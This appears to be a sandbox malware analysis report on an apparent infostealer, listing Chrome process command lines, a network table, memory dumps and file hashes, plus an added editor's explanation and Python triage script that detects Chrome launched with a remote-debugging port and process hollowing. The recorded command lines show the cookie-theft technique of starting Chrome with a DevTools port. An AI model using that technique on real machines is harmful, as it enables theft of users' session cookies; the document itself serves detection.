"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1536 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1644 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2180 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2472 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2480 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1616 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef8059758,0x7fef8059768,0x7fef8059778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1088 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1468 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2552 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2568 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1552 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3816 --field-trial-handle=1372,i,2977375304706110644,11846281783688700316,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| NL | 185.201.252.32:80 | 185.201.252.32 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 185.201.252.32:80 | 185.201.252.32 | tcp |
| NL | 185.201.252.32:80 | 185.201.252.32 | tcp |
| N/A | 127.0.0.1:9229 | | tcp |
| N/A | 127.0.0.1:9229 | | tcp |
| N/A | 127.0.0.1:9229 | | tcp |
| N/A | 127.0.0.1:9229 | | tcp |
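Added example, not part of the sandbox report: the "Uses browser remote debugging" signature above corresponds to chrome.exe being started with --remote-debugging-port=9229 and an empty --profile-directory, and the four connections to 127.0.0.1:9229 in the network table are a local client talking to that DevTools listener; this is how infostealers read cookies through the DevTools protocol instead of decrypting the on-disk store (general knowledge, not a statement the report makes). The SetThreadContext row (PID 2316 on 2656, same image on both sides) is the process-hollowing shape. The script below pulls both out of the recorded data. Command lines are a subset copied from the process list, the network and thread-context rows are copied from the tables; the field names in the result are the editor's own.

```python
import re

# Constructed sample input copied from the behavioral5 process list (subset), network table
# and SetThreadContext table above.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
CMDLINES = [
    f'"{SAMPLE}"',
    f'"{SAMPLE}"',
    r"C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 504",
    f'"{CHROME}" --remote-debugging-port=9229 --profile-directory=""',
    f'"{CHROME}" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process '
    "--remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 "
    "--num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 "
    "--mojo-platform-channel-handle=2180 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:1",
    f'"{CHROME}" --remote-debugging-port=9229 --profile-directory=""',
    "ctfmon.exe",
]
NETWORK_ROWS = [
    "| NL | 185.201.252.32:80 | 185.201.252.32 | tcp |",
    "| N/A | 224.0.0.251:5353 | | udp |",
    "| N/A | 127.0.0.1:9229 | | tcp |",
    "| N/A | 127.0.0.1:9229 | | tcp |",
    "| N/A | 127.0.0.1:9229 | | tcp |",
    "| N/A | 127.0.0.1:9229 | | tcp |",
]
THREAD_CONTEXT_ROWS = [
    f"| PID 2316 set thread context of 2656 | N/A | {SAMPLE} | {SAMPLE} |",
]


def cells(row: str) -> list[str]:
    return [c.strip() for c in row.strip().strip("|").split("|")]


def image_name(cmdline: str) -> str:
    """Lower-cased basename of argv[0], whether or not it is quoted."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    image = m.group(1) or m.group(2)
    return image.rsplit("\\", 1)[-1].lower()


def parse_chrome_debug(cmdline: str):
    """{port, profile} for a top-level chrome.exe started with a DevTools port, else None."""
    if image_name(cmdline) != "chrome.exe" or "--type=" in cmdline:
        return None  # renderer/gpu/utility children inherit the flag; only the browser process listens
    port = re.search(r"--remote-debugging-port=(\d+)", cmdline)
    if not port:
        return None
    prof = re.search(r'--profile-directory=(?:"([^"]*)"|(\S*))', cmdline)
    profile = (prof.group(1) if prof.group(1) is not None else prof.group(2)) if prof else None
    return {"port": int(port.group(1)), "profile": profile}


def find_debug_launches(cmdlines) -> list:
    return [d for d in map(parse_chrome_debug, cmdlines) if d]


def loopback_hits(rows, ports) -> int:
    """Count network rows whose destination is 127.0.0.1 on one of the DevTools ports."""
    n = 0
    for row in rows:
        host, _, port = cells(row)[1].rpartition(":")
        if host == "127.0.0.1" and port.isdigit() and int(port) in ports:
            n += 1
    return n


def parse_thread_context(row: str):
    """Parse 'PID A set thread context of B'; the same image on both sides suggests hollowing."""
    c = cells(row)
    m = re.search(r"PID (\d+) set thread context of (\d+)", c[0])
    if not m:
        return None
    return {"parent": int(m.group(1)), "child": int(m.group(2)), "same_image": c[2].lower() == c[3].lower()}


def triage(cmdlines, net_rows, ctx_rows) -> dict:
    launches = find_debug_launches(cmdlines)
    ports = {d["port"] for d in launches}
    hollow = [h for h in map(parse_thread_context, ctx_rows) if h and h["same_image"]]
    return {
        "debug_launches": len(launches),
        "debug_ports": sorted(ports),
        "empty_profile_dir": any(d["profile"] == "" for d in launches),
        "loopback_to_debug_port": loopback_hits(net_rows, ports),
        "self_injection": [f"{h['parent']}->{h['child']}" for h in hollow],
    }


if __name__ == "__main__":
    print(triage(CMDLINES, NETWORK_ROWS, THREAD_CONTEXT_ROWS))
```

Filtering on the absence of --type= is what keeps the renderer and gpu lines from being counted as separate launches: they carry --remote-debugging-port=9229 too, but only the browser process opens the listener. In an EDR rule the equivalent is chrome.exe with that flag whose parent is not explorer.exe or another interactive parent, joined with a loopback connection to the same port from a non-browser process.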
Files
memory/2316-0-0x00000000746AE000-0x00000000746AF000-memory.dmp
memory/2316-1-0x0000000000CD0000-0x0000000000D14000-memory.dmp
memory/2656-3-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2656-12-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2656-11-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2656-8-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2656-7-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2656-6-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2656-5-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2656-4-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2316-13-0x00000000746A0000-0x0000000074D8E000-memory.dmp
memory/2656-14-0x0000000000400000-0x0000000000650000-memory.dmp
memory/2656-15-0x0000000061E00000-0x0000000061EF3000-memory.dmp
\??\pipe\crashpad_2540_FGTIYMJFKNCDCTXG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\000001.dbtmp
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\000002.dbtmp
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
memory/2316-260-0x00000000746A0000-0x0000000074D8E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | c71a70ef46590ef0016a755286ca78ea |
| SHA1 | f333ef55abb71212507b4796cb0e39940dd9280f |
| SHA256 | 36315c353e2802a76481df39dfd6b80bdc993f3db521aef716a1f927990decf3 |
| SHA512 | 333e0c4300fd0baf59072bbf7c363c62e11d7b2351ec9e84125dec4c1047dd29bedaf99fd1c3bcc3fa43353a51f2b006030829b8c5615a7b29ffb9ed3a903295 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
| MD5 | f732dbed9289177d15e236d0f8f2ddd3 |